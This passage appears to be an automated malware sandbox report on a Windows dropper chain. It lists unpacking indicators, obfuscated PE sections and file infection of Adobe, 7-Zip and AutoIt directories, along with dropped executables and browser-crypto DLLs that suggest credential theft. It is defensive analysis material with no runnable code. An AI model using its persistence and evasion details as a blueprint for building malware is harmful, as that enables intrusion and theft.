                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXT
                          Source: file.exeStatic file information: File size 3223040 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: Raw size of utqttalq is bigger than: 0x100000 < 0x2a7000
                          Source: Binary string: mozglue.pdbP source: b6866cbf49.exe, 0000001B.00000002.3396642326.000000006BD2D000.00000002.00000001.01000000.0000001D.sdmp
                          Source: Binary string: nss3.pdb@ source: b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Cryptor2\Workspace\940993430\Project\Release\Project.pdb source: 6f9ea40b81.exe, 00000008.00000000.2413825497.0000000000F1C000.00000002.00000001.01000000.0000000A.sdmp, 6f9ea40b81.exe, 00000008.00000002.3715162072.0000000000F1C000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: nss3.pdb source: b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: fa1ce2a324.exe, 0000001D.00000003.2710807717.0000000004830000.00000004.00001000.00020000.00000000.sdmp, fa1ce2a324.exe, 0000001D.00000002.2890134171.0000000000B62000.00000040.00000001.01000000.00000014.sdmp
                          Source: Binary string: mozglue.pdb source: b6866cbf49.exe, 0000001B.00000002.3396642326.000000006BD2D000.00000002.00000001.01000000.0000001D.sdmp

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W;utqttalq:EW;cjsrlafd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;utqttalq:EW;cjsrlafd:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.90000.0.unpack :EW;.rsrc:W;.idata :W;utqttalq:EW;cjsrlafd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;utqttalq:EW;cjsrlafd:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.90000.0.unpack :EW;.rsrc:W;.idata :W;utqttalq:EW;cjsrlafd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;utqttalq:EW;cjsrlafd:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeUnpacked PE file: 7.2.4508a44a11.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.00cfg:R;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeUnpacked PE file: 27.2.b6866cbf49.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hkzervik:EW;xvdziszc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hkzervik:EW;xvdziszc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeUnpacked PE file: 29.2.fa1ce2a324.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W;qufopntd:EW;phedmodh:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeUnpacked PE file: 33.2.b6866cbf49.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hkzervik:EW;xvdziszc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hkzervik:EW;xvdziszc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeUnpacked PE file: 36.2.09be480dc7.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awzrkizh:EW;dziymjtb:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeUnpacked PE file: 38.2.b6866cbf49.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hkzervik:EW;xvdziszc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hkzervik:EW;xvdziszc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeUnpacked PE file: 42.2.fa1ce2a324.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W;qufopntd:EW;phedmodh:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeUnpacked PE file: 7.2.4508a44a11.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1C858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00B1C858
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: fa1ce2a324.exe.6.drStatic PE information: real checksum: 0x2bf403 should be: 0x2bd5f2
                          Source: b6866cbf49.exe.6.drStatic PE information: real checksum: 0x1bfc48 should be: 0x1bc81b
                          Source: random[1].exe2.6.drStatic PE information: real checksum: 0x1bfc48 should be: 0x1bc81b
                          Source: 7z.exe.39.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                          Source: 09be480dc7.exe.6.drStatic PE information: real checksum: 0x1e384a should be: 0x1e88e3
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x321cec should be: 0x3206bc
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: real checksum: 0x321cec should be: 0x3206bc
                          Source: 7z.dll.39.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                          Source: 4ZD5C3i[1].exe.6.drStatic PE information: real checksum: 0x1223c5 should be: 0x12728e
                          Source: random[2].exe0.6.drStatic PE information: real checksum: 0x1e384a should be: 0x1e88e3
                          Source: random[3].exe.27.drStatic PE information: real checksum: 0x321cec should be: 0x3206bc
                          Source: 4ZD5C3i.exe.6.drStatic PE information: real checksum: 0x1223c5 should be: 0x12728e
                          Source: file.exeStatic PE information: real checksum: 0x321cec should be: 0x3206bc
                          Source: random[2].exe.6.drStatic PE information: real checksum: 0x2bf403 should be: 0x2bd5f2
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: utqttalq
                          Source: file.exeStatic PE information: section name: cjsrlafd
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: utqttalq
                          Source: skotes.exe.0.drStatic PE information: section name: cjsrlafd
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: hkzervik
                          Source: random[1].exe2.6.drStatic PE information: section name: xvdziszc
                          Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                          Source: b6866cbf49.exe.6.drStatic PE information: section name:
                          Source: b6866cbf49.exe.6.drStatic PE information: section name: .idata
                          Source: b6866cbf49.exe.6.drStatic PE information: section name:
                          Source: b6866cbf49.exe.6.drStatic PE information: section name: hkzervik
                          Source: b6866cbf49.exe.6.drStatic PE information: section name: xvdziszc
                          Source: b6866cbf49.exe.6.drStatic PE information: section name: .taggant
                          Source: random[2].exe.6.drStatic PE information: section name:
                          Source: random[2].exe.6.drStatic PE information: section name: .idata
                          Source: random[2].exe.6.drStatic PE information: section name: qufopntd
                          Source: random[2].exe.6.drStatic PE information: section name: phedmodh
                          Source: random[2].exe.6.drStatic PE information: section name: .taggant
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name:
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name: .idata
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name: qufopntd
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name: phedmodh
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name: .taggant
                          Source: random[2].exe0.6.drStatic PE information: section name:
                          Source: random[2].exe0.6.drStatic PE information: section name: .idata
                          Source: random[2].exe0.6.drStatic PE information: section name:
                          Source: random[2].exe0.6.drStatic PE information: section name: awzrkizh
                          Source: random[2].exe0.6.drStatic PE information: section name: dziymjtb
                          Source: random[2].exe0.6.drStatic PE information: section name: .taggant
                          Source: 09be480dc7.exe.6.drStatic PE information: section name:
                          Source: 09be480dc7.exe.6.drStatic PE information: section name: .idata
                          Source: 09be480dc7.exe.6.drStatic PE information: section name:
                          Source: 09be480dc7.exe.6.drStatic PE information: section name: awzrkizh
                          Source: 09be480dc7.exe.6.drStatic PE information: section name: dziymjtb
                          Source: 09be480dc7.exe.6.drStatic PE information: section name: .taggant
                          Source: freebl3.dll.27.drStatic PE information: section name: .00cfg
                          Source: freebl3[1].dll.27.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.27.drStatic PE information: section name: .00cfg
                          Source: mozglue[1].dll.27.drStatic PE information: section name: .00cfg
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name:
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name: .idata
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name: utqttalq
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name: cjsrlafd
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name: .taggant
                          Source: random[3].exe.27.drStatic PE information: section name:
                          Source: random[3].exe.27.drStatic PE information: section name: .idata
                          Source: random[3].exe.27.drStatic PE information: section name: utqttalq
                          Source: random[3].exe.27.drStatic PE information: section name: cjsrlafd
                          Source: random[3].exe.27.drStatic PE information: section name: .taggant
                          Source: msvcp140.dll.27.drStatic PE information: section name: .didat
                          Source: msvcp140[1].dll.27.drStatic PE information: section name: .didat
                          Source: nss3.dll.27.drStatic PE information: section name: .00cfg
                          Source: nss3[1].dll.27.drStatic PE information: section name: .00cfg
                          Source: softokn3.dll.27.drStatic PE information: section name: .00cfg
                          Source: softokn3[1].dll.27.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4D91C push ecx; ret 0_2_00F4D92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F41359 push es; ret 0_2_00F4135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000AD91C push ecx; ret 1_2_000AD92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000AD91C push ecx; ret 2_2_000AD92F
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00ADA098 pushad ; ret 7_2_00ADA0C2
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00ADA098 push 64111D25h; ret 7_2_00ADA113
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD62E3 push ebp; iretd 7_2_00AD62EE
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00ADA0C3 push 64111D25h; ret 7_2_00ADA113
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD8E2D push ecx; retf 7_2_00AD8E33
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD647C push esp; ret 7_2_00AD649B
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD999B pushfd ; ret 7_2_00AD99F5
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD9931 pushfd ; ret 7_2_00AD99F5
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00AD9746 push ss; retf 7_2_00AD9752
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00CD5EA5 push 03FFFFF9h; ret 8_2_00CD5EAA
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh8_2_0043CA63
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00439F70 push eax; mov dword ptr [esp], 60616263h8_2_00439F7F
                          Source: file.exeStatic PE information: section name: entropy: 7.107829480645206
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.107829480645206
                          Source: random[1].exe2.6.drStatic PE information: section name: hkzervik entropy: 7.953330512379526
                          Source: b6866cbf49.exe.6.drStatic PE information: section name: hkzervik entropy: 7.953330512379526
                          Source: random[2].exe.6.drStatic PE information: section name: entropy: 7.7903842539691635
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name: entropy: 7.7903842539691635
                          Source: random[2].exe0.6.drStatic PE information: section name: awzrkizh entropy: 7.941890926694712
                          Source: 09be480dc7.exe.6.drStatic PE information: section name: awzrkizh entropy: 7.941890926694712
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name: entropy: 7.107829480645206
                          Source: random[3].exe.27.drStatic PE information: section name: entropy: 7.107829480645206

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files to the document folder of the user
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\Documents\JEBGCBAFCG.exeJump to dropped file
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7-zip.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7z.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\7-zip32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\Welcome.html
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\Documents\JEBGCBAFCG.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4ZD5C3i[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
